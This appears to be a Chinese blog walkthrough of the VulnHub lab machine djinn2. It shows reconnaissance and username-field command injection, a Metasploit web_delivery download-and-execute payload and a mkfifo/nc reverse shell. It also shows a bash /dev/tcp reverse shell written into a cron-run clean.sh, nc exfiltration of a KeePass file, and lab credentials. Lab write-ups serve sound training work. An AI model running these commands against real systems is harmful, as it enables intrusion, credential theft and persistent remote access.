首页 > 其他分享 >vulnhub靶机:djinn2

vulnhub靶机:djinn2

时间:2024-03-20 18:12:26浏览次数:25  
标签:tmp shell 10.9 nc 端口 djinn2 DiykQoIe vulnhub 靶机

一:信息收集

1:主机发现

靶机ip

10.9.23.228

2:端口扫描

nmap -A -p- -T4 10.9.23.228

上一个靶机多了个5000端口

21
22
1337
5000
7331

3:端口探测

1:21端口

anonymous

nitu:7846A$56

@nitish81299

@0xmzfr

2:1337端口

和第一个游戏不太一样,没啥用

3:5000端口

被拒绝了

4:7331端口

先看看wish

同样被拒绝

4:目录遍历

gobuster dir -u http://10.9.23.228:7331/ -w /usr/share/dirb/wordlists/big.txt

/robots.txt

得到一个目录

/letshack

没有东西,访问最后一个

/source

下载了一个东西

像一个python脚本,提示了5000端口加入用户名和密码

REDACTED

但是之前5000端口不能正常访问,bp抓包修改参数

发现username字段存在命令执行漏洞

尝试反弹shell

二:渗透测试

1:反弹shell

msf反弹

  1. msfconsole
  2. use exploit/multi/script/web_delivery
  3. set target 7
  4. set payload linux/x64/meterpreter/reverse_tcp
  5. set lhost 10.9.23.112
  6. set SRVPORT 8081
  7. run

不同的版本target不同,因为8080端口让bp占用了,所以修改为8081

wget -qO DiykQoIe --no-check-certificate http://10.9.23.112:8081/UWJWdunqTEI; chmod +x DiykQoIe; ./DiykQoIe& disown

复制出来之后需要注意三点:

(1)不能直接全部粘上去执行,因为前面是过滤分号的

(2)传参的地方不能直接使用空格,空格可以使用%20或者+代替

(3)下载之后需要指定路径为tmp

wget+-qO+/tmp/DiykQoIe+--no-check-certificate+http://10.9.23.112:8081/UWJWdunqTEI

chmod+777+/tmp/DiykQoIe

/tmp/DiykQoIe

msf5成功产生seseion

sessions -i 1

升级shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

搜集信息,在/var/backups发现有个 nitu.kdbx文件,学习之后发现是个keepass2的文件,keepass是个密码管理工具,下载这个工具,查看密码,这里密码就是creds.txt里面的7846A$56

nc接收文件

发送端

nc 10.9.23.112 1337 < /var/backups/nitu.kdbx -w 1

接收端

nc -lvnp 1337 > /var/backups/nitu.kdbx

用kepass打开

得到用户名和密码

nitish

&HtMGd$LJB

2:ssh登录

ssh [email protected]

查看开启的端口服务

ss -anptl

使用nc本地连接一下,输入账号密码得到内容

nc 127.0.0.1 2843

使用到第6个的时候,发现了一些信息,似乎查看notes的时候,会把name作为文件名cat一下

选择5新建一个note,name设置为/etc/passwd,看看能不能读取到内容,可以发现是能够成功读取到的

接着就是反弹shell,不能直接使用bash反弹,使用逆向连接脚本 revshellgen生成payload,成功反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.9.23.112 6666 >/tmp/f

反弹成功

在/var/mail/ugtan发现一个任务

进入到家目录,发现best/admin/ever路径,进入到里面,将反弹shell一句话写入到clean.sh,本地监听,稍等一会(定时任务是每三分钟执行一次)

echo "bash -i >& /dev/tcp/10.9.23.112/8888 0>&1" >clean.sh
chmod 777 clean.sh

成功反弹,运行proof.sh,渗透结束

标签:tmp,shell,10.9,nc,端口,djinn2,DiykQoIe,vulnhub,靶机
From: https://www.cnblogs.com/woaishuaidan/p/18085790

相关文章

  • vulnhub靶机:djinn1
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.2122:端口扫描nmap-A-p--T410.9.23.212ftp允许匿名登录扫描ssh时被过滤了1337不知道是个什么端口7331端口是个python环境的web服务3:端口探测1:ftp端口ftp10.9.23.212anonymous查看文件......
  • buuctf靶机笔记3
    BUUXSSCOURSE首页如此显然是持久性xss将数据存储到后台管理员访问后台触发xss后可以盗取cookie对后台进行登录但我们还不知道后台地址先尝试:<script>alert(1)</script>提交成功尝试访问没有触发弹窗可能后台存在过滤尝试用img标签:<imgsrc='11'onerror=alert(11......
  • vulnhub靶机:dc-8
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机ip10.9.23.742:端口扫描nmap-A-p--T410.9.23.743:端口探测4:目录遍历dirbhttp://10.9.23.74http://10.9.23.74/robots.txt发现有登录界面地址,访问一下:/?q=user/login/发现可能存在sql注入二:渗透测......
  • vulnhub靶机:dc-7
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.1572:端口扫描nmap-A-p--T410.9.23.1573:端口探测给的提示去搜索一下@DC7USER发现是github的一些代码,下载进行查看在config.php配置文件里发现了用户名和密码$username="dc7user";$passwo......
  • Vulnhub之DarkHole_1
    DarkHole_1一信息收集IP扫描端口扫描访问80目录扫描查看目录80网页-->login注册用户我的id是2,那么应该有个账号是id=1,尝试越权修改id=1的密码把id改为1发现登陆成功,多了一个上传文件的地方,前面的目录扫描中我们也发现了/upload路径,尝试上传反弹shell上传一句话木......
  • vulnhub靶机:dc-6
    一:信息收集1:主机发现靶机IP10.9.23.1302:端口扫描nmap-A-p--T410.9.23.1303:端口探测访问失败,返回wordy的域名,在添加hosts文件:访问成功后发现和dc2长的很像用的是wordpress,用wpscan试一下wpscan--urlhttp://wordy/-eu扫出来五个用户名adminmarkgraham......
  • BUUCTF靶机笔记
    BUUBRUTE11启动靶机后可以看到是一个登陆页面查看源代码:没有有用的信息只是单纯的html页面随便填一个用户:admin密码:123提示密码为四位怀疑是暴力破解使用burp进行单点爆破payload设定暴力完成查看length不同的数据包返回flag:flag{6982d5b6-a2f8-48d8-aec6......
  • vulnhub靶机:dc-5
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042:端口扫描nmap-A-p--T410.9.23.2043:端口探测发现contact里面他有输入框发现底下这个页脚会发生变化,猜测存在文件包含漏洞,先扫一下目录4:目录遍历dirsearch-u10.9.23......
  • Vulnhub内网渗透Jangow01靶场通关
    详细请见个人博客靶场下载地址。下载下来后是.vmdk格式,vm直接导入。M1请使用UTM进行搭建,教程见此。该靶场可能出现网络问题,解决方案见此信息搜集arp-scan-l #主机发现ip为192.168.168.15nmap-sV-A-p-192.168.168.15 #端口扫描发现开放了21ftp和80http端口,对......
  • vulnhub靶机:dc4
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机的ip10.9.23.522:端口扫描nmap-A-p--T410.9.23.523:端口探测二:渗透测试1:密码爆破尝试九头蛇进行爆破构建语句:hydra-ladmin-Ppass.txt10.9.23.52http-post-form"/login.php:us......